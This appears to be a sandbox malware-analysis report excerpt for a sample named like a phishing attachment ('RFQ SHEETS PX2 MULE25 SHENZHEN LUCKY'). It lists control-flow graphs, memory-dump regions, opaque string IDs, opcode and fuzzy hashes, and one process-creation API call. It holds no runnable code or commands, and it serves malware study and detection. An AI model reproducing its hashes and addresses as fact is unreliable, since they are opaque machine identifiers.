                                                                                                                                                                                                control_flow_graph 4896 1727a78-1727aae 4897 1727ab6-1727abc 4896->4897 5042 1727ab0 call 1727435 4896->5042 5043 1727ab0 call 172744b 4896->5043 5044 1727ab0 call 1727a78 4896->5044 5045 1727ab0 call 1727a68 4896->5045 4898 1727abe-1727ac2 4897->4898 4899 1727b0c-1727b10 4897->4899 4900 1727ad1-1727ad8 4898->4900 4901 1727ac4-1727ac9 4898->4901 4902 1727b12-1727b21 4899->4902 4903 1727b27-1727b3b 4899->4903 4904 1727bae-1727bc6 4900->4904 4905 1727ade-1727ae5 4900->4905 4901->4900 4906 1727b23-1727b25 4902->4906 4907 1727b4d-1727b57 4902->4907 4908 1727b43-1727b4a 4903->4908 4918 1727bc8 4904->4918 4919 1727bc9-1727beb 4904->4919 4905->4899 4909 1727ae7-1727aeb 4905->4909 4906->4908 4910 1727b61-1727b65 4907->4910 4911 1727b59-1727b5f 4907->4911 4912 1727afa-1727b01 4909->4912 4913 1727aed-1727af2 4909->4913 4915 1727b6d-1727ba7 4910->4915 4916 1727b67 4910->4916 4911->4915 4912->4904 4917 1727b07-1727b0a 4912->4917 4913->4912 4915->4904 4916->4915 4917->4908 4918->4919 4920 1727bf6-1727c16 4919->4920 4921 1727bed-1727bf3 4919->4921 4927 1727c18 4920->4927 4928 1727c1d-1727c24 4920->4928 4921->4920 4929 1727fac-1727fb5 4927->4929 4931 1727c26-1727c31 4928->4931 4932 1727c37-1727c4a 4931->4932 4933 1727fbd-1727fc9 4931->4933 4937 1727c60-1727c7b 4932->4937 4938 1727c4c-1727c5a 4932->4938 4939 1727fcb-1727fcd 4933->4939 4940 172803d-172803f 4933->4940 4952 1727c9f-1727ca2 4937->4952 4953 1727c7d-1727c83 4937->4953 4938->4937 4950 1727f34-1727f3b 4938->4950 4941 1728041-1728044 4939->4941 4942 1727fcf-1727fd1 4939->4942 4945 1728045-172804a 4940->4945 4941->4945 4944 1727fd3-1727fe5 4942->4944 4942->4945 4944->4940 4947 1728094 4945->4947 4948 172804c-172805b 4945->4948 4954 1728099-172809b 4947->4954 4948->4947 4970 172805d-1728063 4948->4970 4950->4929 4955 1727f3d-1727f3f 
4950->4955 4956 1727ca8-1727cab 4952->4956 4957 1727dfc-1727e02 4952->4957 4958 1727c85 4953->4958 4959 1727c8c-1727c8f 4953->4959 4962 1727f41-1727f46 4955->4962 4963 1727f4e-1727f54 4955->4963 4956->4957 4967 1727cb1-1727cb7 4956->4967 4961 1727eee-1727ef1 4957->4961 4966 1727e08-1727e0d 4957->4966 4958->4957 4958->4959 4960 1727cc2-1727cc8 4958->4960 4958->4961 4959->4960 4964 1727c91-1727c94 4959->4964 4973 1727cca-1727ccc 4960->4973 4974 1727cce-1727cd0 4960->4974 4975 1727ef7-1727efd 4961->4975 4976 1727fb8 4961->4976 4962->4963 4963->4933 4971 1727f56-1727f5b 4963->4971 4968 1727c9a 4964->4968 4969 1727d2e-1727d34 4964->4969 4966->4961 4967->4957 4972 1727cbd 4967->4972 4968->4961 4969->4961 4981 1727d3a-1727d40 4969->4981 4977 1728067-1728073 4970->4977 4978 1728065 4970->4978 4979 1727fa0-1727fa3 4971->4979 4980 1727f5d-1727f62 4971->4980 4972->4961 4982 1727cda-1727ce3 4973->4982 4974->4982 4983 1727f22-1727f26 4975->4983 4984 1727eff-1727f07 4975->4984 4976->4933 4986 1728075-172808e 4977->4986 4978->4986 4979->4976 4985 1727fa5-1727faa 4979->4985 4980->4976 4987 1727f64 4980->4987 4988 1727d42-1727d44 4981->4988 4989 1727d46-1727d48 4981->4989 4991 1727cf6-1727d04 4982->4991 4992 1727ce5-1727cf0 4982->4992 4983->4950 4993 1727f28-1727f2e 4983->4993 4984->4933 4990 1727f0d-1727f1c 4984->4990 4985->4929 4985->4955 4986->4947 5012 1728090-1728092 4986->5012 4994 1727f6b-1727f70 4987->4994 4996 1727d52-1727d69 4988->4996 4989->4996 4990->4937 4990->4983 5007 1727d0d-1727d1e 4991->5007 4992->4961 4992->4991 4993->4931 4993->4950 4999 1727f92-1727f94 4994->4999 5000 1727f72-1727f74 4994->5000 5010 1727d94-1727dbb 4996->5010 5011 1727d6b-1727d84 4996->5011 4999->4976 5006 1727f96-1727f99 4999->5006 5003 1727f83-1727f89 5000->5003 5004 1727f76-1727f7b 5000->5004 5003->4933 5009 1727f8b-1727f90 5003->5009 5004->5003 5006->4979 5017 1727e12-1727e48 5007->5017 5018 1727d24-1727d29 5007->5018 5009->4999 5013 1727f66-1727f69 5009->5013 5010->4976 5023 
1727dc1-1727dc4 5010->5023 5011->5017 5021 1727d8a-1727d8f 5011->5021 5012->4954 5013->4976 5013->4994 5024 1727e55-1727e5d 5017->5024 5025 1727e4a-1727e4e 5017->5025 5018->5017 5021->5017 5023->4976 5026 1727dca-1727df3 5023->5026 5024->4976 5029 1727e63-1727e68 5024->5029 5027 1727e50-1727e53 5025->5027 5028 1727e6d-1727e71 5025->5028 5026->5017 5041 1727df5-1727dfa 5026->5041 5027->5024 5027->5028 5030 1727e73-1727e79 5028->5030 5031 1727e90-1727e94 5028->5031 5029->4961 5030->5031 5035 1727e7b-1727e83 5030->5035 5033 1727e96-1727e9c 5031->5033 5034 1727e9e-1727ebd call 17280a0 5031->5034 5033->5034 5036 1727ec3-1727ec7 5033->5036 5034->5036 5035->4976 5037 1727e89-1727e8e 5035->5037 5036->4961 5039 1727ec9-1727ee5 5036->5039 5037->4961 5039->4961 5041->5017 5042->4897 5043->4897 5044->4897 5045->4897
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                                                                                • API String ID: 0-879173519
                                                                                                                                                                                                • Opcode ID: 064b6e026396a83c398759720d4b39c37aa64a15736a3f84c3db18b380591f93
                                                                                                                                                                                                • Instruction ID: c56a547de66844aa2fa8780cde7dddc63539296906af288cefef948740485636
                                                                                                                                                                                                • Opcode Fuzzy Hash: 064b6e026396a83c398759720d4b39c37aa64a15736a3f84c3db18b380591f93
                                                                                                                                                                                                • Instruction Fuzzy Hash: BF127D31A00229CFDB19CF69C984AAEFBF6FF99310F148469E905AB261D731DD42CB51

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                control_flow_graph 5166 80abf98-80abfbd 5167 80abfbf 5166->5167 5168 80abfc4-80abfe8 5166->5168 5167->5168 5169 80abfe9 5168->5169 5170 80abff0-80ac00c 5169->5170 5171 80ac00e 5170->5171 5172 80ac015-80ac016 5170->5172 5171->5169 5171->5172 5173 80ac10a-80ac13d call 80aa2d8 5171->5173 5174 80ac068-80ac070 5171->5174 5175 80ac16e-80ac171 5171->5175 5176 80ac0ae-80ac0c6 5171->5176 5177 80ac22d-80ac236 5171->5177 5178 80ac041-80ac052 5171->5178 5179 80ac145 5171->5179 5180 80ac1db-80ac20e call 80a5528 5171->5180 5181 80ac01b-80ac03f 5171->5181 5182 80ac23b-80ac244 5171->5182 5183 80ac0f2-80ac105 5171->5183 5184 80ac190-80ac1a8 5171->5184 5185 80ac216-80ac228 5171->5185 5172->5182 5173->5179 5187 80ac077-80ac082 5174->5187 5191 80ac17a-80ac18b 5175->5191 5200 80ac0c8-80ac0d7 5176->5200 5201 80ac0d9-80ac0e0 5176->5201 5177->5170 5204 80ac072-80ac074 5178->5204 5205 80ac054-80ac066 5178->5205 5189 80ac14e-80ac169 5179->5189 5180->5185 5181->5170 5183->5170 5202 80ac1aa-80ac1b9 5184->5202 5203 80ac1bb-80ac1c2 5184->5203 5185->5170 5196 80ac084-80ac093 5187->5196 5197 80ac095-80ac09c 5187->5197 5189->5170 5191->5170 5199 80ac0a3-80ac0a9 5196->5199 5197->5199 5199->5170 5207 80ac0e7-80ac0ed 5200->5207 5201->5207 5208 80ac1c9-80ac1d6 5202->5208 5203->5208 5204->5187 5205->5170 5207->5170 5208->5170
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: e\1$e\1$"*p$"*p
                                                                                                                                                                                                • API String ID: 0-1513742261
                                                                                                                                                                                                • Opcode ID: a105a8ba221034d3170973e214d113ffc7f9ecf4204e57b3cc0172f47d9687e4
                                                                                                                                                                                                • Instruction ID: c773cc49f5aef9f49bdaea2c732265503032c8f4517b19794d82d1d48182f2d2
• Opcode Fuzzy Hash: a105a8ba221034d3170973e214d113ffc7f9ecf4204e57b3cc0172f47d9687e4
• Instruction Fuzzy Hash: BA8100B4D052198FCB14CFE9D9946EEBBF2BF88301F24942AD416BB258DB345A02CF54
Strings
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: TJcq$XX^q$XX^q
• API String ID: 0-3920166351
• Opcode ID: 167f11c7878394a70a253ee5e1cffc6470e665c4126a86276a485df368131677
• Instruction ID: 5faa004fbd27f2631d682fbc28381a38049d9fddbf405623ac2efebf268600ac
• Opcode Fuzzy Hash: 167f11c7878394a70a253ee5e1cffc6470e665c4126a86276a485df368131677
• Instruction Fuzzy Hash: 43529270A00224CFD764DF69C854B6DB7B2FF89310F1484AAE509AB3A1DB759D82CF51

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph of the function starting at 80a4510 (entry block 80a4510-80a452a); the rendered graph is not recoverable as text.]
Strings
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: 6f$6f$$^q
• API String ID: 0-2554587936
• Opcode ID: 78eab8962686bc6aa2f63e981d730c5833e982ac3201c571b723ba00bdebdf7e
• Instruction ID: 5b588eb0a5d02a39242165462024891b4a20e54e6efeacb719c24a345ea23e11
• Opcode Fuzzy Hash: 78eab8962686bc6aa2f63e981d730c5833e982ac3201c571b723ba00bdebdf7e
• Instruction Fuzzy Hash: 3471D2B8E01208DFDB58DFA9D58459EBBB3FF88301F20952AD50AAB354DB349981CF51

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph of the function starting at 80b5540 (entry block 80b5540-80b5542); the rendered graph is not recoverable as text.]
Memory Dump Source
• Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b00fa9fcd338afcc77fd7b5a977f895cf3fed5b280eb1ad415f96839bbec020
• Instruction ID: a1c3511fd35ccfcf15f591b798e0ad056cf34151cbd7f231005e310fa776e127
• Opcode Fuzzy Hash: 3b00fa9fcd338afcc77fd7b5a977f895cf3fed5b280eb1ad415f96839bbec020
• Instruction Fuzzy Hash: 7B83E070915628CBDB64EF69ED88A9CBBB1FF46300F4065E9C088A6251DF345EE8CF45
Strings
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: (o^q$Hbq
• API String ID: 0-662517225
• Opcode ID: 844ba05c27705f4624b1bdc423e01aef3b3aa01a2a38f0b514def505c4c2d2d8
• Instruction ID: 38a6477e58ae58cd47fdce6cfe8aecdde194252ac592310e7db91ee568756791
• Opcode Fuzzy Hash: 844ba05c27705f4624b1bdc423e01aef3b3aa01a2a38f0b514def505c4c2d2d8
• Instruction Fuzzy Hash: 41029F70A002298FDB19DF69C954BAEBBF2FF98300F148569E509DB395DB349D42CB90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: Te^q$Te^q
• API String ID: 0-3743469327
• Opcode ID: 7ff078222945288f7c58c2ec26b59e764338c2b22af5714cc5901c726739944f
• Instruction ID: f6bd415e8e92b0a7b86e37d4f05b0cba83e1598189152761b4a890bc7dced322
• Opcode Fuzzy Hash: 7ff078222945288f7c58c2ec26b59e764338c2b22af5714cc5901c726739944f
• Instruction Fuzzy Hash: EAC15874E0421A9FDB44CFAAC884ADEFBB2FF89310F24856AD419BB254D7309941CF65
Strings
Memory Dump Source
• Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: Xbq$$^q
• API String ID: 0-1593437937
• Opcode ID: 97ccb2e69bffa1a46fa2eedf18b4aa1813c1a70be2f31f37fe99d4d5f52d0682
• Instruction ID: 03a0de462006dbe1a9e0ac6d37527bcca27ce0828908c66e2fb8db500a3fa085
• Opcode Fuzzy Hash: 97ccb2e69bffa1a46fa2eedf18b4aa1813c1a70be2f31f37fe99d4d5f52d0682
• Instruction Fuzzy Hash: AC819674F002198FDB589F78885427F7BB7BFC8B15B15852DE546E7298CE3488828792
Strings
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: 6f$$^q
• API String ID: 0-857817941
• Opcode ID: f0c3fd339e68f3e89a6d9ac19b5b7f01570261cb6388b9d4d8ae701b1ceb26f0
• Instruction ID: d7d13abc9ec5834fa5cc500c02c35c062918e0ca895b1c386692cebd83a79991
• Opcode Fuzzy Hash: f0c3fd339e68f3e89a6d9ac19b5b7f01570261cb6388b9d4d8ae701b1ceb26f0
• Instruction Fuzzy Hash: 6171D378E01208DFDB48DFA9D48459EBBB3FF89301F20952AD90AAB355DB349942CF51
APIs
• CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 080ABB83
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: 1e7124ff6db85e5878f847340a4acf838b49b5141a151dc12c1ad4ee60f6566a
• Instruction ID: 161ec43c7b86639aa5fd94fb67080c9713e073e882c947e9637a9f6d7edd0ecb
• Opcode Fuzzy Hash: 1e7124ff6db85e5878f847340a4acf838b49b5141a151dc12c1ad4ee60f6566a
• Instruction Fuzzy Hash: 7851F871D0021ADFDB64CF99C940BDDBBB6BF48310F0484AAE519B7250DB75AA85CF90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: kQD
• API String ID: 0-3066535408
• Opcode ID: 8ad2b8e57d8d537d15c122a63fda41271bd0d905d98404edf116c7057f859a24
• Instruction ID: 0a08d5701b121923095e7551e01c9e4a3303360eaf3c2d260a24487b482491dd
• Opcode Fuzzy Hash: 8ad2b8e57d8d537d15c122a63fda41271bd0d905d98404edf116c7057f859a24
• Instruction Fuzzy Hash: 18D15B74D05209EFCB08CFA9C4908AEFBB2FF49341B15D56AD445AB324DB35A942CF91
Memory Dump Source
• Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b38835ce4f8d03acc02ff9697ab61378fa68ef5e212e2ff83581762b96cee56c
• Instruction ID: ea119bb2b8bc8ae60c28de1496ff44a7361ecec446e0ff9fcd9c37359be230d1
• Opcode Fuzzy Hash: b38835ce4f8d03acc02ff9697ab61378fa68ef5e212e2ff83581762b96cee56c
• Instruction Fuzzy Hash: A6E2E070D05628CBDB24EF69ED886ADBBB1FB49300F5054E9D088A7254DB305EE8CF59
Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 9ef408b5a359882e6fb2faf77f2a656c5b09bdf9ae6686d6cde280959d7e141a
                                                                                                                                                                                                • Instruction ID: 8b9f93809cacea5633e6996839eb0ae95141c221dc60e5e1f383cf6800066a35
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ef408b5a359882e6fb2faf77f2a656c5b09bdf9ae6686d6cde280959d7e141a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FE2D070D04628CBDB24EF69ED886ADBBB1FB49300F5054E9D088A7255DB305EE8CF59
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: >NG
                                                                                                                                                                                                • API String ID: 0-1926143806
                                                                                                                                                                                                • Opcode ID: 2bc5edf33266bd5107d49a902146e7f1eff7e7710cb1ed11e53d83b51e540584
                                                                                                                                                                                                • Instruction ID: 61f9131d37dec5a8380639d06e4f278a4c6d6184b4714b0094b2217ea95e29c9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bc5edf33266bd5107d49a902146e7f1eff7e7710cb1ed11e53d83b51e540584
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C512974E0521A8FDB48CFA9D5405AEFBF2FF89300F14D16AD519E7254D7348A81CBA4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                • API String ID: 0-4251816714
                                                                                                                                                                                                • Opcode ID: c27d1738bef732cbeda082a9f4d34bfe4954d93a9283fba4b1078e257b2487d5
                                                                                                                                                                                                • Instruction ID: 48a5c2f1d1f8d114305907964e00d31e9a3b6e7aab8395497f637a26b952ac5f
                                                                                                                                                                                                • Opcode Fuzzy Hash: c27d1738bef732cbeda082a9f4d34bfe4954d93a9283fba4b1078e257b2487d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D51F6B5E057588FDB59CFAAC8446DDBBF2AF89300F04C0AAD508EB265DB345A85CF00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: >NG
                                                                                                                                                                                                • API String ID: 0-1926143806
                                                                                                                                                                                                • Opcode ID: ec8836148d44764f9bb013b709f0ef73735ce39a384cd6e37f91ad4ae5394258
                                                                                                                                                                                                • Instruction ID: afe3d21325489f5f83a31085ba77477ab997582c1d8c8b3f70a6fc8aa275e0bb
                                                                                                                                                                                                • Opcode Fuzzy Hash: ec8836148d44764f9bb013b709f0ef73735ce39a384cd6e37f91ad4ae5394258
                                                                                                                                                                                                • Instruction Fuzzy Hash: E8510774E0521A8FDB48CFA9C5415AEFBF2BF88200F14D12AD619E7254D7349A81CBA4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                • API String ID: 0-4251816714
                                                                                                                                                                                                • Opcode ID: 26e87fe2a911fffee0b6bfcf84f8f0b2eeb5f8cb55bf78d1ee0fb960f9511748
                                                                                                                                                                                                • Instruction ID: 9ed81669482753367fb1989f4136bce4e3b7475cdf6000c79377cac634330a22
                                                                                                                                                                                                • Opcode Fuzzy Hash: 26e87fe2a911fffee0b6bfcf84f8f0b2eeb5f8cb55bf78d1ee0fb960f9511748
                                                                                                                                                                                                • Instruction Fuzzy Hash: 415184B5E01658CFDB58CFAAC9446DDBBF2AFC9305F14C0AAD509AB224DB305A85CF40
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477577013.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6650000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 73fb39cd0b24730ade55d0ca68d37fdc5576b52ff107baf574402be3413b101e
                                                                                                                                                                                                • Instruction ID: 19e4aba3f2f8f666931bbfe04deffacd38b906d9465a1cb9e462a708b2907d6f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 73fb39cd0b24730ade55d0ca68d37fdc5576b52ff107baf574402be3413b101e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E527C70A003158FDB54DF68C844B98B7F2FF89314F2586A9D5586F3A1DB71A982CF81
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477577013.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6650000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d0afd3700dc1274f04b9862a60a11dbd723204b308e9090202fed89721f272a7
                                                                                                                                                                                                • Instruction ID: 7d75d2a82febe47985cca36144f77339c75e97f8add860c17fb3d613ee8229f3
                                                                                                                                                                                                • Opcode Fuzzy Hash: d0afd3700dc1274f04b9862a60a11dbd723204b308e9090202fed89721f272a7
                                                                                                                                                                                                • Instruction Fuzzy Hash: E9527D70A003568FDB54DF68C844B98B7F2FF85314F2586A9D5586F3A2DB71A982CF80
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 95c983952d3288f70d1e96b7bf14b559c1d1d9f0f16110067dc2e5f24099f0c3
                                                                                                                                                                                                • Instruction ID: 28d591c4d754febffde0cdd39aabafa7703cb731618276c722481a5d8814797c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 95c983952d3288f70d1e96b7bf14b559c1d1d9f0f16110067dc2e5f24099f0c3
                                                                                                                                                                                                • Instruction Fuzzy Hash: BAF17474A00228CFE724DF69C894BADB7B2FF44310F1484A9D10AAB395DB759D86CF51
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 91e837e8d8a086468206ab0f7d25bc9887bff3c4f935ad5f2943ea31d8d4d2a0
                                                                                                                                                                                                • Instruction ID: 29644692d78ab61b4296370b7b0cadcb6cf97586fe42fc35cd6c979269ff7ae9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 91e837e8d8a086468206ab0f7d25bc9887bff3c4f935ad5f2943ea31d8d4d2a0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BF17174A00228CFDB64DF69C894BADB7B2FF84310F1484A9D10AAB395DB759D82CF51
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 058147c7cc036f050c7623e7423270d2bc8d6f250196e26f0a0d229e72579637
                                                                                                                                                                                                • Instruction ID: 8c9996ae09621897eda29cc45961b3d60666313f4bdcbb7cd8fa365a1414340d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 058147c7cc036f050c7623e7423270d2bc8d6f250196e26f0a0d229e72579637
                                                                                                                                                                                                • Instruction Fuzzy Hash: CDF12574E052698FCB65CF69C884B9DBBB6BF88340F1495AAD41EA7254D770AEC1CF00
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 53101c47d6ccfb755201e855988f8d5df786f60dd3c129e0a9500de289e00048
                                                                                                                                                                                                • Instruction ID: 786701053620c229d20921f31571931eaea9198beec9d04b103eb5f9f482606f
